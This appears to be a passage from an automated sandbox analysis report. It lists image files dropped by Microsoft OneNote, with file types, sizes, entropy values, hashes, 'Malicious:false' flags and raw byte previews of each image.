                                                                                                        Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2898
                                                                                                        Entropy (8bit):7.551512280854713
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                        MD5:7C7D9922101488124D2E4666709198AC
                                                                                                        SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                        SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                        SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):29187
                                                                                                        Entropy (8bit):7.971308326749753
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                        MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                        SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                        SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                        SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4819
                                                                                                        Entropy (8bit):7.874649683222419
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                        MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                        SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                        SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                        SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1717
                                                                                                        Entropy (8bit):7.154087739587035
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                        MD5:943371B39CA847674998535110462220
                                                                                                        SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                        SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                        SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3555
                                                                                                        Entropy (8bit):7.686253071499049
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                        MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                        SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                        SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                        SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3428
                                                                                                        Entropy (8bit):7.766473352510893
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                        MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                        SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                        SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                        SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65589
                                                                                                        Entropy (8bit):7.960181939300061
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                        MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                        SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                        SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                        SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1873
                                                                                                        Entropy (8bit):7.534961703340853
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                        MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                        SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                        SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                        SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5465
                                                                                                        Entropy (8bit):7.79401348966645
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                        MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                        SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                        SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                        SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3361
                                                                                                        Entropy (8bit):7.619405839796034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                        MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                        SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                        SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                        SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):140755
                                                                                                        Entropy (8bit):7.9013245181576695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                        MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                        SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                        SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                        SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):129887
                                                                                                        Entropy (8bit):7.8877849553452695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                        MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                        SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                        SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                        SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84941
                                                                                                        Entropy (8bit):7.966881945560921
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                        MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                        SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                        SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                        SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1569
                                                                                                        Entropy (8bit):7.583832946136897
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                        MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                        SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                        SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                        SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
